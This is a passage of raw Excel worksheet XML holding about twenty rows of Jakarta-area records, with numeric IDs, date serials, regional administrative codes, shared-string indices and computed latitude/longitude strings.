        <f t="shared" si="63"/>
        <v>-6.16507150,106.74600919</v>
      </c>
    </row>
    <row r="4040" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4040">
        <v>298969</v>
      </c>
      <c r="B4040" s="1">
        <v>44507</v>
      </c>
      <c r="C4040" t="s">
        <v>13636</v>
      </c>
      <c r="D4040" t="s">
        <v>22</v>
      </c>
      <c r="E4040" t="s">
        <v>23</v>
      </c>
      <c r="F4040" t="s">
        <v>13637</v>
      </c>
      <c r="H4040" t="s">
        <v>26</v>
      </c>
      <c r="I4040" t="s">
        <v>27</v>
      </c>
      <c r="J4040" t="s">
        <v>404</v>
      </c>
      <c r="L4040" t="s">
        <v>13638</v>
      </c>
      <c r="M4040">
        <v>3174020005</v>
      </c>
      <c r="N4040">
        <v>3174020</v>
      </c>
      <c r="O4040">
        <v>3174</v>
      </c>
      <c r="P4040">
        <v>31</v>
      </c>
      <c r="Q4040" t="s">
        <v>30</v>
      </c>
      <c r="R4040" t="s">
        <v>31</v>
      </c>
      <c r="S4040" t="s">
        <v>32</v>
      </c>
      <c r="T4040" t="s">
        <v>33</v>
      </c>
      <c r="U4040" s="5">
        <v>10677050114</v>
      </c>
      <c r="V4040" s="5" t="s">
        <v>18103</v>
      </c>
      <c r="W4040" s="5">
        <v>-616832099</v>
      </c>
      <c r="X4040" t="s">
        <v>21835</v>
      </c>
      <c r="Y4040" t="str">
        <f t="shared" si="63"/>
        <v>-6.16832099,106.77050114</v>
      </c>
    </row>
    <row r="4041" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4041">
        <v>298957</v>
      </c>
      <c r="B4041" s="1">
        <v>44507</v>
      </c>
      <c r="C4041" t="s">
        <v>13639</v>
      </c>
      <c r="D4041" t="s">
        <v>22</v>
      </c>
      <c r="E4041" t="s">
        <v>23</v>
      </c>
      <c r="F4041" t="s">
        <v>13640</v>
      </c>
      <c r="G4041" t="s">
        <v>13641</v>
      </c>
      <c r="H4041" t="s">
        <v>26</v>
      </c>
      <c r="I4041" t="s">
        <v>65</v>
      </c>
      <c r="J4041" t="s">
        <v>404</v>
      </c>
      <c r="L4041" t="s">
        <v>13642</v>
      </c>
      <c r="M4041">
        <v>3174020005</v>
      </c>
      <c r="N4041">
        <v>3174020</v>
      </c>
      <c r="O4041">
        <v>3174</v>
      </c>
      <c r="P4041">
        <v>31</v>
      </c>
      <c r="Q4041" t="s">
        <v>30</v>
      </c>
      <c r="R4041" t="s">
        <v>31</v>
      </c>
      <c r="S4041" t="s">
        <v>32</v>
      </c>
      <c r="T4041" t="s">
        <v>33</v>
      </c>
      <c r="U4041" s="5">
        <v>10676924330</v>
      </c>
      <c r="V4041" s="5" t="s">
        <v>18104</v>
      </c>
      <c r="W4041" s="5">
        <v>-616610580</v>
      </c>
      <c r="X4041" t="s">
        <v>21836</v>
      </c>
      <c r="Y4041" t="str">
        <f t="shared" si="63"/>
        <v>-6.16610580,106.76924330</v>
      </c>
    </row>
    <row r="4042" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4042">
        <v>298948</v>
      </c>
      <c r="B4042" s="1">
        <v>44507</v>
      </c>
      <c r="C4042" t="s">
        <v>13643</v>
      </c>
      <c r="D4042" t="s">
        <v>22</v>
      </c>
      <c r="E4042" t="s">
        <v>23</v>
      </c>
      <c r="F4042" t="s">
        <v>13644</v>
      </c>
      <c r="G4042" t="s">
        <v>13645</v>
      </c>
      <c r="H4042" t="s">
        <v>26</v>
      </c>
      <c r="I4042" t="s">
        <v>974</v>
      </c>
      <c r="J4042" t="s">
        <v>404</v>
      </c>
      <c r="L4042" t="s">
        <v>13646</v>
      </c>
      <c r="M4042">
        <v>3174020005</v>
      </c>
      <c r="N4042">
        <v>3174020</v>
      </c>
      <c r="O4042">
        <v>3174</v>
      </c>
      <c r="P4042">
        <v>31</v>
      </c>
      <c r="Q4042" t="s">
        <v>30</v>
      </c>
      <c r="R4042" t="s">
        <v>31</v>
      </c>
      <c r="S4042" t="s">
        <v>32</v>
      </c>
      <c r="T4042" t="s">
        <v>33</v>
      </c>
      <c r="U4042" s="5">
        <v>10676942794</v>
      </c>
      <c r="V4042" s="5" t="s">
        <v>18105</v>
      </c>
      <c r="W4042" s="5">
        <v>-616607807</v>
      </c>
      <c r="X4042" t="s">
        <v>21837</v>
      </c>
      <c r="Y4042" t="str">
        <f t="shared" si="63"/>
        <v>-6.16607807,106.76942794</v>
      </c>
    </row>
    <row r="4043" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4043">
        <v>298960</v>
      </c>
      <c r="B4043" s="1">
        <v>44507</v>
      </c>
      <c r="C4043" t="s">
        <v>13647</v>
      </c>
      <c r="D4043" t="s">
        <v>22</v>
      </c>
      <c r="E4043" t="s">
        <v>23</v>
      </c>
      <c r="F4043" t="s">
        <v>13648</v>
      </c>
      <c r="G4043" t="s">
        <v>13649</v>
      </c>
      <c r="H4043" t="s">
        <v>26</v>
      </c>
      <c r="I4043" t="s">
        <v>1340</v>
      </c>
      <c r="J4043" t="s">
        <v>404</v>
      </c>
      <c r="L4043" t="s">
        <v>13650</v>
      </c>
      <c r="M4043">
        <v>3174020005</v>
      </c>
      <c r="N4043">
        <v>3174020</v>
      </c>
      <c r="O4043">
        <v>3174</v>
      </c>
      <c r="P4043">
        <v>31</v>
      </c>
      <c r="Q4043" t="s">
        <v>30</v>
      </c>
      <c r="R4043" t="s">
        <v>31</v>
      </c>
      <c r="S4043" t="s">
        <v>32</v>
      </c>
      <c r="T4043" t="s">
        <v>33</v>
      </c>
      <c r="U4043" s="5">
        <v>10677031050</v>
      </c>
      <c r="V4043" s="5" t="s">
        <v>18106</v>
      </c>
      <c r="W4043" s="5">
        <v>-616796120</v>
      </c>
      <c r="X4043" t="s">
        <v>21838</v>
      </c>
      <c r="Y4043" t="str">
        <f t="shared" si="63"/>
        <v>-6.16796120,106.77031050</v>
      </c>
    </row>
    <row r="4044" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4044">
        <v>298949</v>
      </c>
      <c r="B4044" s="1">
        <v>44507</v>
      </c>
      <c r="C4044" t="s">
        <v>13651</v>
      </c>
      <c r="D4044" t="s">
        <v>22</v>
      </c>
      <c r="E4044" t="s">
        <v>23</v>
      </c>
      <c r="F4044" t="s">
        <v>13652</v>
      </c>
      <c r="G4044" t="s">
        <v>13653</v>
      </c>
      <c r="H4044" t="s">
        <v>26</v>
      </c>
      <c r="I4044" t="s">
        <v>1604</v>
      </c>
      <c r="J4044" t="s">
        <v>530</v>
      </c>
      <c r="L4044" t="s">
        <v>13654</v>
      </c>
      <c r="M4044">
        <v>3174020006</v>
      </c>
      <c r="N4044">
        <v>3174020</v>
      </c>
      <c r="O4044">
        <v>3174</v>
      </c>
      <c r="P4044">
        <v>31</v>
      </c>
      <c r="Q4044" t="s">
        <v>427</v>
      </c>
      <c r="R4044" t="s">
        <v>31</v>
      </c>
      <c r="S4044" t="s">
        <v>32</v>
      </c>
      <c r="T4044" t="s">
        <v>33</v>
      </c>
      <c r="U4044" s="5">
        <v>10675798595</v>
      </c>
      <c r="V4044" s="5" t="s">
        <v>18107</v>
      </c>
      <c r="W4044" s="5">
        <v>-618636344</v>
      </c>
      <c r="X4044" t="s">
        <v>21839</v>
      </c>
      <c r="Y4044" t="str">
        <f t="shared" si="63"/>
        <v>-6.18636344,106.75798595</v>
      </c>
    </row>
    <row r="4045" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4045">
        <v>298966</v>
      </c>
      <c r="B4045" s="1">
        <v>44507</v>
      </c>
      <c r="C4045" t="s">
        <v>13655</v>
      </c>
      <c r="D4045" t="s">
        <v>22</v>
      </c>
      <c r="E4045" t="s">
        <v>23</v>
      </c>
      <c r="F4045" t="s">
        <v>13656</v>
      </c>
      <c r="H4045" t="s">
        <v>26</v>
      </c>
      <c r="I4045" t="s">
        <v>974</v>
      </c>
      <c r="J4045" t="s">
        <v>13657</v>
      </c>
      <c r="L4045" t="s">
        <v>13658</v>
      </c>
      <c r="M4045">
        <v>3174070005</v>
      </c>
      <c r="N4045">
        <v>3174070</v>
      </c>
      <c r="O4045">
        <v>3174</v>
      </c>
      <c r="P4045">
        <v>31</v>
      </c>
      <c r="Q4045" t="s">
        <v>568</v>
      </c>
      <c r="R4045" t="s">
        <v>84</v>
      </c>
      <c r="S4045" t="s">
        <v>32</v>
      </c>
      <c r="T4045" t="s">
        <v>33</v>
      </c>
      <c r="U4045" s="5">
        <v>10674174786</v>
      </c>
      <c r="V4045" s="5" t="s">
        <v>18108</v>
      </c>
      <c r="W4045" s="5">
        <v>-615228210</v>
      </c>
      <c r="X4045" t="s">
        <v>21840</v>
      </c>
      <c r="Y4045" t="str">
        <f t="shared" si="63"/>
        <v>-6.15228210,106.74174786</v>
      </c>
    </row>
    <row r="4046" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4046">
        <v>298982</v>
      </c>
      <c r="B4046" s="1">
        <v>44508</v>
      </c>
      <c r="C4046" t="s">
        <v>13659</v>
      </c>
      <c r="D4046" t="s">
        <v>22</v>
      </c>
      <c r="E4046" t="s">
        <v>23</v>
      </c>
      <c r="F4046" t="s">
        <v>13660</v>
      </c>
      <c r="G4046" t="s">
        <v>13661</v>
      </c>
      <c r="H4046" t="s">
        <v>26</v>
      </c>
      <c r="I4046" t="s">
        <v>2139</v>
      </c>
      <c r="J4046" t="s">
        <v>13662</v>
      </c>
      <c r="L4046" t="s">
        <v>13663</v>
      </c>
      <c r="M4046">
        <v>3171050004</v>
      </c>
      <c r="N4046">
        <v>3171050</v>
      </c>
      <c r="O4046">
        <v>3171</v>
      </c>
      <c r="P4046">
        <v>31</v>
      </c>
      <c r="Q4046" t="s">
        <v>8148</v>
      </c>
      <c r="R4046" t="s">
        <v>508</v>
      </c>
      <c r="S4046" t="s">
        <v>108</v>
      </c>
      <c r="T4046" t="s">
        <v>33</v>
      </c>
      <c r="U4046" s="5">
        <v>10677184138</v>
      </c>
      <c r="V4046" s="5" t="s">
        <v>18109</v>
      </c>
      <c r="W4046" s="5">
        <v>-623812521</v>
      </c>
      <c r="X4046" t="s">
        <v>21841</v>
      </c>
      <c r="Y4046" t="str">
        <f t="shared" si="63"/>
        <v>-6.23812521,106.77184138</v>
      </c>
    </row>
    <row r="4047" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4047">
        <v>298959</v>
      </c>
      <c r="B4047" s="1">
        <v>44507</v>
      </c>
      <c r="C4047" t="s">
        <v>13664</v>
      </c>
      <c r="D4047" t="s">
        <v>22</v>
      </c>
      <c r="E4047" t="s">
        <v>23</v>
      </c>
      <c r="F4047" t="s">
        <v>13665</v>
      </c>
      <c r="G4047" t="s">
        <v>13666</v>
      </c>
      <c r="H4047" t="s">
        <v>26</v>
      </c>
      <c r="I4047" t="s">
        <v>1194</v>
      </c>
      <c r="J4047" t="s">
        <v>5026</v>
      </c>
      <c r="L4047" t="s">
        <v>13667</v>
      </c>
      <c r="M4047">
        <v>3171060004</v>
      </c>
      <c r="N4047">
        <v>3171060</v>
      </c>
      <c r="O4047">
        <v>3171</v>
      </c>
      <c r="P4047">
        <v>31</v>
      </c>
      <c r="Q4047" t="s">
        <v>5027</v>
      </c>
      <c r="R4047" t="s">
        <v>1236</v>
      </c>
      <c r="S4047" t="s">
        <v>108</v>
      </c>
      <c r="T4047" t="s">
        <v>33</v>
      </c>
      <c r="U4047" s="5">
        <v>10680971018</v>
      </c>
      <c r="V4047" s="5" t="s">
        <v>18110</v>
      </c>
      <c r="W4047" s="5">
        <v>-624683270</v>
      </c>
      <c r="X4047" t="s">
        <v>21842</v>
      </c>
      <c r="Y4047" t="str">
        <f t="shared" si="63"/>
        <v>-6.24683270,106.80971018</v>
      </c>
    </row>
    <row r="4048" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4048">
        <v>298970</v>
      </c>
      <c r="B4048" s="1">
        <v>44507</v>
      </c>
      <c r="C4048" t="s">
        <v>13668</v>
      </c>
      <c r="D4048" t="s">
        <v>22</v>
      </c>
      <c r="E4048" t="s">
        <v>23</v>
      </c>
      <c r="F4048" t="s">
        <v>13669</v>
      </c>
      <c r="G4048" t="s">
        <v>13670</v>
      </c>
      <c r="H4048" t="s">
        <v>26</v>
      </c>
      <c r="I4048" t="s">
        <v>8140</v>
      </c>
      <c r="J4048" t="s">
        <v>4142</v>
      </c>
      <c r="L4048" t="s">
        <v>13671</v>
      </c>
      <c r="M4048">
        <v>3171040004</v>
      </c>
      <c r="N4048">
        <v>3171040</v>
      </c>
      <c r="O4048">
        <v>3171</v>
      </c>
      <c r="P4048">
        <v>31</v>
      </c>
      <c r="Q4048" t="s">
        <v>4144</v>
      </c>
      <c r="R4048" t="s">
        <v>163</v>
      </c>
      <c r="S4048" t="s">
        <v>108</v>
      </c>
      <c r="T4048" t="s">
        <v>33</v>
      </c>
      <c r="U4048" s="5">
        <v>10675984056</v>
      </c>
      <c r="V4048" s="5" t="s">
        <v>18111</v>
      </c>
      <c r="W4048" s="5">
        <v>-623924492</v>
      </c>
      <c r="X4048" t="s">
        <v>21843</v>
      </c>
      <c r="Y4048" t="str">
        <f t="shared" si="63"/>
        <v>-6.23924492,106.75984056</v>
      </c>
    </row>
    <row r="4049" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4049">
        <v>299005</v>
      </c>
      <c r="B4049" s="1">
        <v>44512</v>
      </c>
      <c r="C4049" t="s">
        <v>13672</v>
      </c>
      <c r="D4049" t="s">
        <v>22</v>
      </c>
      <c r="E4049" t="s">
        <v>23</v>
      </c>
      <c r="F4049" t="s">
        <v>13673</v>
      </c>
      <c r="H4049" t="s">
        <v>26</v>
      </c>
      <c r="I4049" t="s">
        <v>523</v>
      </c>
      <c r="J4049" t="s">
        <v>118</v>
      </c>
      <c r="L4049" t="s">
        <v>13674</v>
      </c>
      <c r="M4049">
        <v>3171070001</v>
      </c>
      <c r="N4049">
        <v>3171070</v>
      </c>
      <c r="O4049">
        <v>3171</v>
      </c>
      <c r="P4049">
        <v>31</v>
      </c>
      <c r="Q4049" t="s">
        <v>120</v>
      </c>
      <c r="R4049" t="s">
        <v>121</v>
      </c>
      <c r="S4049" t="s">
        <v>108</v>
      </c>
      <c r="T4049" t="s">
        <v>33</v>
      </c>
      <c r="U4049" s="5">
        <v>10681118217</v>
      </c>
      <c r="V4049" s="5" t="s">
        <v>18112</v>
      </c>
      <c r="W4049" s="5">
        <v>-625781958</v>
      </c>
      <c r="X4049" t="s">
        <v>21844</v>
      </c>
      <c r="Y4049" t="str">
        <f t="shared" si="63"/>
        <v>-6.25781958,106.81118217</v>
      </c>
    </row>
    <row r="4050" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4050">
        <v>298975</v>
      </c>
      <c r="B4050" s="1">
        <v>44508</v>
      </c>
      <c r="C4050" t="s">
        <v>13675</v>
      </c>
      <c r="D4050" t="s">
        <v>85</v>
      </c>
      <c r="E4050" t="s">
        <v>23</v>
      </c>
      <c r="F4050" t="s">
        <v>13676</v>
      </c>
      <c r="G4050" t="s">
        <v>13677</v>
      </c>
      <c r="H4050" t="s">
        <v>26</v>
      </c>
      <c r="I4050" t="s">
        <v>13678</v>
      </c>
      <c r="J4050" t="s">
        <v>13679</v>
      </c>
      <c r="K4050" t="s">
        <v>13680</v>
      </c>
      <c r="L4050" t="s">
        <v>13681</v>
      </c>
      <c r="M4050">
        <v>3171070003</v>
      </c>
      <c r="N4050">
        <v>3171070</v>
      </c>
      <c r="O4050">
        <v>3171</v>
      </c>
      <c r="P4050">
        <v>31</v>
      </c>
      <c r="Q4050" t="s">
        <v>7458</v>
      </c>
      <c r="R4050" t="s">
        <v>121</v>
      </c>
      <c r="S4050" t="s">
        <v>108</v>
      </c>
      <c r="T4050" t="s">
        <v>33</v>
      </c>
      <c r="U4050" s="5">
        <v>10682762210</v>
      </c>
      <c r="V4050" s="5" t="s">
        <v>18113</v>
      </c>
      <c r="W4050" s="5">
        <v>-624805540</v>
      </c>
      <c r="X4050" t="s">
        <v>21845</v>
      </c>
      <c r="Y4050" t="str">
        <f t="shared" si="63"/>
        <v>-6.24805540,106.82762210</v>
      </c>
    </row>
    <row r="4051" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4051">
        <v>298950</v>
      </c>
      <c r="B4051" s="1">
        <v>44507</v>
      </c>
      <c r="C4051" t="s">
        <v>13682</v>
      </c>
      <c r="D4051" t="s">
        <v>22</v>
      </c>
      <c r="E4051" t="s">
        <v>23</v>
      </c>
      <c r="F4051" t="s">
        <v>13683</v>
      </c>
      <c r="G4051" t="s">
        <v>13684</v>
      </c>
      <c r="H4051" t="s">
        <v>26</v>
      </c>
      <c r="I4051" t="s">
        <v>1651</v>
      </c>
      <c r="J4051" t="s">
        <v>13685</v>
      </c>
      <c r="L4051" t="s">
        <v>13686</v>
      </c>
      <c r="M4051">
        <v>3171040004</v>
      </c>
      <c r="N4051">
        <v>3171040</v>
      </c>
      <c r="O4051">
        <v>3171</v>
      </c>
      <c r="P4051">
        <v>31</v>
      </c>
      <c r="Q4051" t="s">
        <v>4144</v>
      </c>
      <c r="R4051" t="s">
        <v>163</v>
      </c>
      <c r="S4051" t="s">
        <v>108</v>
      </c>
      <c r="T4051" t="s">
        <v>33</v>
      </c>
      <c r="U4051" s="5">
        <v>10675700576</v>
      </c>
      <c r="V4051" s="5" t="s">
        <v>18114</v>
      </c>
      <c r="W4051" s="5">
        <v>-624609384</v>
      </c>
      <c r="X4051" t="s">
        <v>21846</v>
      </c>
      <c r="Y4051" t="str">
        <f t="shared" si="63"/>
        <v>-6.24609384,106.75700576</v>
      </c>
    </row>
    <row r="4052" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4052">
        <v>298968</v>
      </c>
      <c r="B4052" s="1">
        <v>44507</v>
      </c>
      <c r="C4052" t="s">
        <v>13687</v>
      </c>
      <c r="D4052" t="s">
        <v>22</v>
      </c>
      <c r="E4052" t="s">
        <v>23</v>
      </c>
      <c r="F4052" t="s">
        <v>13688</v>
      </c>
      <c r="G4052" t="s">
        <v>13689</v>
      </c>
      <c r="H4052" t="s">
        <v>26</v>
      </c>
      <c r="I4052" t="s">
        <v>27</v>
      </c>
      <c r="J4052" t="s">
        <v>5026</v>
      </c>
      <c r="L4052" t="s">
        <v>13690</v>
      </c>
      <c r="M4052">
        <v>3171060004</v>
      </c>
      <c r="N4052">
        <v>3171060</v>
      </c>
      <c r="O4052">
        <v>3171</v>
      </c>
      <c r="P4052">
        <v>31</v>
      </c>
      <c r="Q4052" t="s">
        <v>5027</v>
      </c>
      <c r="R4052" t="s">
        <v>1236</v>
      </c>
      <c r="S4052" t="s">
        <v>108</v>
      </c>
      <c r="T4052" t="s">
        <v>33</v>
      </c>
      <c r="U4052" s="5">
        <v>10681095958</v>
      </c>
      <c r="V4052" s="5" t="s">
        <v>18115</v>
      </c>
      <c r="W4052" s="5">
        <v>-624562742</v>
      </c>
      <c r="X4052" t="s">
        <v>21847</v>
      </c>
      <c r="Y4052" t="str">
        <f t="shared" si="63"/>
        <v>-6.24562742,106.81095958</v>
      </c>
    </row>
    <row r="4053" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4053">
        <v>298961</v>
      </c>
      <c r="B4053" s="1">
        <v>44507</v>
      </c>
      <c r="C4053" t="s">
        <v>13691</v>
      </c>
      <c r="D4053" t="s">
        <v>22</v>
      </c>
      <c r="E4053" t="s">
        <v>23</v>
      </c>
      <c r="F4053" t="s">
        <v>13692</v>
      </c>
      <c r="G4053" t="s">
        <v>13693</v>
      </c>
      <c r="H4053" t="s">
        <v>26</v>
      </c>
      <c r="I4053" t="s">
        <v>2395</v>
      </c>
      <c r="J4053" t="s">
        <v>118</v>
      </c>
      <c r="L4053" t="s">
        <v>13694</v>
      </c>
      <c r="M4053">
        <v>3171070001</v>
      </c>
      <c r="N4053">
        <v>3171070</v>
      </c>
      <c r="O4053">
        <v>3171</v>
      </c>
      <c r="P4053">
        <v>31</v>
      </c>
      <c r="Q4053" t="s">
        <v>120</v>
      </c>
      <c r="R4053" t="s">
        <v>121</v>
      </c>
      <c r="S4053" t="s">
        <v>108</v>
      </c>
      <c r="T4053" t="s">
        <v>33</v>
      </c>
      <c r="U4053" s="5">
        <v>10682181234</v>
      </c>
      <c r="V4053" s="5" t="s">
        <v>18116</v>
      </c>
      <c r="W4053" s="5">
        <v>-625569747</v>
      </c>
      <c r="X4053" t="s">
        <v>21848</v>
      </c>
      <c r="Y4053" t="str">
        <f t="shared" si="63"/>
        <v>-6.25569747,106.82181234</v>
      </c>
    </row>
    <row r="4054" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4054">
        <v>298952</v>
      </c>
      <c r="B4054" s="1">
        <v>44507</v>
      </c>
      <c r="C4054" t="s">
        <v>13695</v>
      </c>
      <c r="D4054" t="s">
        <v>22</v>
      </c>
      <c r="E4054" t="s">
        <v>23</v>
      </c>
      <c r="F4054" t="s">
        <v>13696</v>
      </c>
      <c r="G4054" t="s">
        <v>13697</v>
      </c>
      <c r="H4054" t="s">
        <v>26</v>
      </c>
      <c r="I4054" t="s">
        <v>1651</v>
      </c>
      <c r="J4054" t="s">
        <v>13685</v>
      </c>
      <c r="L4054" t="s">
        <v>13698</v>
      </c>
      <c r="M4054">
        <v>3171040004</v>
      </c>
      <c r="N4054">
        <v>3171040</v>
      </c>
      <c r="O4054">
        <v>3171</v>
      </c>
      <c r="P4054">
        <v>31</v>
      </c>
      <c r="Q4054" t="s">
        <v>4144</v>
      </c>
      <c r="R4054" t="s">
        <v>163</v>
      </c>
      <c r="S4054" t="s">
        <v>108</v>
      </c>
      <c r="T4054" t="s">
        <v>33</v>
      </c>
      <c r="U4054" s="5">
        <v>10675650024</v>
      </c>
      <c r="V4054" s="5" t="s">
        <v>18117</v>
      </c>
      <c r="W4054" s="5">
        <v>-624701589</v>
      </c>
      <c r="X4054" t="s">
        <v>21849</v>
      </c>
      <c r="Y4054" t="str">
        <f t="shared" si="63"/>
        <v>-6.24701589,106.75650024</v>
      </c>
    </row>
    <row r="4055" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4055">
        <v>298947</v>
      </c>
      <c r="B4055" s="1">
        <v>44507</v>
      </c>
      <c r="C4055" t="s">
        <v>13699</v>
      </c>
      <c r="D4055" t="s">
        <v>22</v>
      </c>
      <c r="E4055" t="s">
        <v>23</v>
      </c>
      <c r="F4055" t="s">
        <v>13700</v>
      </c>
      <c r="G4055" t="s">
        <v>13701</v>
      </c>
      <c r="H4055" t="s">
        <v>26</v>
      </c>
      <c r="I4055" t="s">
        <v>3042</v>
      </c>
      <c r="J4055" t="s">
        <v>13702</v>
      </c>
      <c r="L4055" t="s">
        <v>13703</v>
      </c>
      <c r="M4055">
        <v>3171010002</v>
      </c>
      <c r="N4055">
        <v>3171010</v>
      </c>
      <c r="O4055">
        <v>3171</v>
      </c>
      <c r="P4055">
        <v>31</v>
      </c>
      <c r="Q4055" t="s">
        <v>6607</v>
      </c>
      <c r="R4055" t="s">
        <v>264</v>
      </c>
      <c r="S4055" t="s">
        <v>108</v>
      </c>
      <c r="T4055" t="s">
        <v>33</v>
      </c>
      <c r="U4055" s="5">
        <v>10683096098</v>
      </c>
      <c r="V4055" s="5" t="s">
        <v>18118</v>
      </c>
      <c r="W4055" s="5">
        <v>-634244616</v>
      </c>
      <c r="X4055" t="s">
        <v>21850</v>
      </c>
      <c r="Y4055" t="str">
        <f t="shared" si="63"/>
        <v>-6.34244616,106.83096098</v>
      </c>
    </row>
    <row r="4056" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4056">
        <v>298963</v>
      </c>
      <c r="B4056" s="1">
        <v>44507</v>
      </c>
      <c r="C4056" t="s">
        <v>13704</v>
      </c>
      <c r="D4056" t="s">
        <v>22</v>
      </c>
      <c r="E4056" t="s">
        <v>23</v>
      </c>
      <c r="F4056" t="s">
        <v>13705</v>
      </c>
      <c r="G4056" t="s">
        <v>13706</v>
      </c>
      <c r="H4056" t="s">
        <v>26</v>
      </c>
      <c r="I4056" t="s">
        <v>1447</v>
      </c>
      <c r="J4056" t="s">
        <v>5616</v>
      </c>
      <c r="M4056">
        <v>3171070002</v>
      </c>
      <c r="N4056">
        <v>3171070</v>
      </c>
      <c r="O4056">
        <v>3171</v>
      </c>
      <c r="P4056">
        <v>31</v>
      </c>
      <c r="Q4056" t="s">
        <v>2142</v>
      </c>
      <c r="R4056" t="s">
        <v>121</v>
      </c>
      <c r="S4056" t="s">
        <v>108</v>
      </c>
      <c r="T4056" t="s">
        <v>33</v>
      </c>
      <c r="U4056" s="5">
        <v>10682070285</v>
      </c>
      <c r="V4056" s="5" t="s">
        <v>18119</v>
      </c>
      <c r="W4056" s="5">
        <v>-624674075</v>
      </c>
      <c r="X4056" t="s">
        <v>21851</v>
      </c>
      <c r="Y4056" t="str">
        <f t="shared" si="63"/>
        <v>-6.24674075,106.82070285</v>
      </c>
    </row>
    <row r="4057" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4057">
        <v>298981</v>
      </c>
      <c r="B4057" s="1">
        <v>44508</v>
      </c>
      <c r="C4057" t="s">
        <v>13707</v>
      </c>
      <c r="D4057" t="s">
        <v>22</v>
      </c>
      <c r="E4057" t="s">
        <v>23</v>
      </c>
      <c r="F4057" t="s">
        <v>13708</v>
      </c>
      <c r="G4057" t="s">
        <v>13709</v>
      </c>
      <c r="H4057" t="s">
        <v>26</v>
      </c>
      <c r="I4057" t="s">
        <v>6625</v>
      </c>
      <c r="J4057" t="s">
        <v>10002</v>
      </c>
      <c r="L4057" t="s">
        <v>13710</v>
      </c>
      <c r="M4057">
        <v>3172060008</v>
      </c>
      <c r="N4057">
        <v>3172060</v>
      </c>
      <c r="O4057">
        <v>3172</v>
      </c>
      <c r="P4057">
        <v>31</v>
      </c>
      <c r="Q4057" t="s">
        <v>1096</v>
      </c>
      <c r="R4057" t="s">
        <v>48</v>
      </c>
      <c r="S4057" t="s">
        <v>49</v>
      </c>
      <c r="T4057" t="s">
        <v>33</v>
      </c>
      <c r="U4057" s="5">
        <v>10685753097</v>
      </c>
      <c r="V4057" s="5" t="s">
        <v>18120</v>
      </c>
      <c r="W4057" s="5">
        <v>-621722782</v>
      </c>
      <c r="X4057" t="s">
        <v>21852</v>
      </c>
      <c r="Y4057" t="str">
        <f t="shared" si="63"/>
        <v>-6.21722782,106.85753097</v>
      </c>
    </row>
    <row r="4058" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4058">
        <v>299008</v>
      </c>
      <c r="B4058" s="1">
        <v>44513</v>
      </c>
      <c r="C4058" t="s">
        <v>13711</v>
      </c>
      <c r="D4058" t="s">
        <v>22</v>
      </c>
      <c r="E4058" t="s">
        <v>23</v>
      </c>
      <c r="F4058" t="s">
        <v>13712</v>
      </c>
      <c r="H4058" t="s">
        <v>26</v>
      </c>
      <c r="I4058" t="s">
        <v>2962</v>
      </c>
      <c r="J4058" t="s">
        <v>6433</v>
      </c>
      <c r="L4058" t="s">
        <v>13713</v>
      </c>
      <c r="M4058">
        <v>3172080005</v>
      </c>
      <c r="N4058">
        <v>3172080</v>
      </c>
      <c r="O4058">
        <v>3172</v>
      </c>
      <c r="P4058">
        <v>31</v>
      </c>
      <c r="Q4058" t="s">
        <v>140</v>
      </c>
      <c r="R4058" t="s">
        <v>141</v>
      </c>
      <c r="S4058" t="s">
        <v>49</v>
      </c>
      <c r="T4058" t="s">
        <v>33</v>
      </c>
      <c r="U4058" s="5">
        <v>10695154429</v>
      </c>
      <c r="V4058" s="5" t="s">
        <v>18121</v>
      </c>
      <c r="W4058" s="5">
        <v>-618571497</v>
      </c>
      <c r="X4058" t="s">
        <v>21853</v>
      </c>
      <c r="Y4058" t="str">
        <f t="shared" si="63"/>
        <v>-6.18571497,106.95154429</v>
      </c>
    </row>
    <row r="4059" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4059">
        <v>298909</v>
      </c>
      <c r="B4059" s="1">
        <v>44501</v>
      </c>
      <c r="C4059" t="s">
        <v>13714</v>
      </c>
      <c r="D4059" t="s">
        <v>85</v>
      </c>
      <c r="E4059" t="s">
        <v>23</v>
      </c>
      <c r="F4059" t="s">
        <v>13715</v>
      </c>
      <c r="G4059" t="s">
        <v>13716</v>
      </c>
      <c r="H4059" t="s">
        <v>26</v>
      </c>
      <c r="J4059" t="s">
        <v>13717</v>
      </c>
      <c r="K4059" t="s">
        <v>13718</v>
      </c>
      <c r="L4059" t="s">
        <v>13719</v>
      </c>
      <c r="M4059">
        <v>3172030005</v>
      </c>
      <c r="N4059">
        <v>3172030</v>
      </c>
      <c r="O4059">
        <v>3172</v>
      </c>
      <c r="P4059">
        <v>31</v>
      </c>
      <c r="Q4059" t="s">
        <v>1256</v>
      </c>
      <c r="R4059" t="s">
        <v>228</v>
      </c>
      <c r="S4059" t="s">
        <v>49</v>
      </c>
      <c r="T4059" t="s">
        <v>33</v>
      </c>
      <c r="U4059" s="5">
        <v>10691724210</v>
      </c>
      <c r="V4059" s="5" t="s">
        <v>18122</v>
      </c>
      <c r="W4059" s="5">
        <v>-630403680</v>
      </c>
      <c r="X4059" t="s">
        <v>21854</v>
      </c>
      <c r="Y4059" t="str">
        <f t="shared" si="63"/>
        <v>-6.30403680,106.91724210</v>
      </c>
    </row>
    <row r="4060" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4060">
        <v>298946</v>
      </c>
      <c r="B4060" s="1">
        <v>44507</v>
      </c>
      <c r="C4060" t="s">
        <v>13720</v>
      </c>
      <c r="D4060" t="s">
        <v>22</v>
      </c>
      <c r="E4060" t="s">
        <v>23</v>
      </c>
      <c r="F4060" t="s">
        <v>13721</v>
      </c>
      <c r="G4060" t="s">
        <v>13722</v>
      </c>
